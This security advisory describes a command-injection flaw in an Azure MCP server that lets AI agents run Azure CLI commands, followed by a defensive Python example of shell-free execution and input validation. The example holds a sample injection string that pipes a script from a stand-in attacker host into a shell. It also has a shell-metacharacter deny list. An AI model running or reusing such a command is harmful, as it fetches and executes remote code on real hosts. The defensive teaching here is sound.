Critical Zero‑Day Remote Code Execution Vulnerability in Microsoft Azure MCP AzureCliService
What Happened — A zero‑day command‑injection flaw (CVE‑2026‑XXXXX) in azure-cli-mcp, the Microsoft Azure MCP (Model Context Protocol) server that lets AI agents and other MCP clients run Azure CLI commands, allows an unauthenticated attacker to execute arbitrary commands on the host running the MCP server. The vulnerability was disclosed by the Zero Day Initiative on 24 Mar 2026 and carries a CVSS score of 9.8 (Critical).
Why It Matters for TPRM —
- Any host running the vulnerable MCP server can be compromised without credentials. Because the server wraps the Azure CLI, an attacker typically inherits whatever Azure identity that CLI session is logged in with, putting the confidentiality, integrity, and availability of the downstream Azure resources it can reach at risk.
- Third‑party SaaS providers that run this server inside their Azure environments inherit the risk and may expose their customers’ data through it.
- Exploitation requires only network access to the MCP endpoint, with no authentication or user interaction, which makes the flaw attractive to nation‑state and ransomware actors seeking a foothold in high‑value cloud environments.
Who Is Affected — Cloud service providers, SaaS vendors, and enterprises that run the azure-cli-mcp server against their Microsoft Azure tenants, particularly where the server’s endpoint is exposed over a network rather than only to a local client process (CLOUD_INFRA, CLOUD_HOST). Azure tenants that do not deploy this component are not affected by this specific flaw.
Recommended Actions —
- Immediately review Azure service contracts for clauses covering zero‑day remediation and vendor notification.
- Verify that the identity used by the MCP server’s Azure CLI session (a managed identity or service principal) is scoped to least privilege, and that network segmentation restricts which clients can reach the MCP endpoint, so that a compromise of the host cannot be turned into tenant‑wide access.
- Engage Microsoft support and the component’s maintainers to confirm patch status and apply any out‑of‑band update as soon as it is released. Until a fix is in place, take network‑exposed instances offline or restrict them to trusted clients.
- Conduct a rapid risk assessment of internal services and vendors that depend on the azure-cli-mcp server, review the Azure Activity Log for unexpected operations performed by the identity the server uses, and consider disabling the server or adding monitoring until the patch is applied.
Technical Notes — The flaw stems from insufficient validation of a user‑supplied string before it is passed to a system call in azure-cli-mcp’s AzureCliService. The string supplied by the caller reaches the operating system as command text, so shell metacharacters such as ';' or '|' allow an attacker to append commands of their own to the intended Azure CLI invocation. Exploitation requires no authentication and no user interaction, and it results in code execution with the privileges of the MCP server process. The advisory does not identify specific data types at risk, but the server issues Azure CLI commands against the tenant, so a compromise could lead to data exfiltration or service disruption. Source: Zero Day Initiative advisory
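The following is an added illustration of the class of flaw described above, not code from azure-cli-mcp or from the ZDI advisory. It contrasts the vulnerable pattern (a caller-controlled string handed to a shell) with a hardened front end that tokenizes the command without a shell, allowlists the az command group, and refuses shell metacharacters before anything is executed. The allowlist, the metacharacter set, the function names, and the sample attacker input are all assumptions made for the example; the shell demonstration uses echo so that it is safe to run offline.

```python
import shlex
import subprocess

# Constructed attacker input, modeled on the advisory's description: text that
# looks like an az command but chains a second shell command after it.
MALICIOUS_INPUT = "az account show; curl http://attacker.example/x | sh"

# Hypothetical allowlist of az command groups this server may run (assumption).
ALLOWED_GROUPS = {"account", "group", "resource", "storage", "vm"}
# Characters with meaning to a POSIX shell. A token carrying one of them is
# never a legitimate az argument in this deployment (assumption).
SHELL_META = set(";|&`$<>(){}\n")


def run_through_shell(user_cmd: str) -> str:
    """The vulnerable pattern: the caller's string is handed to /bin/sh -c,
    so ';', '|', '&&' and friends are interpreted as shell operators.
    Demonstrated with echo instead of az so it is harmless to run."""
    return subprocess.run(user_cmd, shell=True, capture_output=True,
                          text=True, check=True).stdout


def parse_az_command(user_cmd: str) -> list:
    """Hardened front end: tokenize with POSIX quoting rules but without a
    shell, then validate the command shape, allowlist the command group and
    reject any token containing a shell metacharacter."""
    argv = shlex.split(user_cmd)
    if len(argv) < 2 or argv[0] != "az":
        raise ValueError("command must have the form: az <group> ...")
    if argv[1] not in ALLOWED_GROUPS:
        raise ValueError(f"az group {argv[1]!r} is not allowed")
    for tok in argv:
        if SHELL_META & set(tok):
            raise ValueError(f"shell metacharacter in argument {tok!r}")
    return argv


def run_argv(argv: list) -> str:
    """Execute an argument vector directly, with no shell in between.
    Metacharacters inside a token reach the program verbatim as data
    instead of being interpreted as operators."""
    return subprocess.run(argv, shell=False, capture_output=True,
                          text=True, check=True).stdout


def validate(user_cmd: str) -> bool:
    """True if the command passes the hardened checks, False otherwise."""
    try:
        parse_az_command(user_cmd)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Shell path: the second command runs.
    print(run_through_shell("echo hello; echo INJECTED"), end="")
    # argv path: the same characters are printed literally, nothing runs.
    print(run_argv(["echo", "hello;", "echo", "INJECTED"]), end="")
    print(validate("az account show --output json"), validate(MALICIOUS_INPUT))
```

In the Java code base that azure-cli-mcp is written in, the equivalent of run_argv is building a ProcessBuilder from a List of arguments rather than concatenating the caller's text into a single command string. The allowlist and metacharacter check add defense in depth: even with a shell-free invocation, an unrestricted argv still lets a caller run any az subcommand the server's identity is authorized for, so constrain the command surface as well as the execution mechanism.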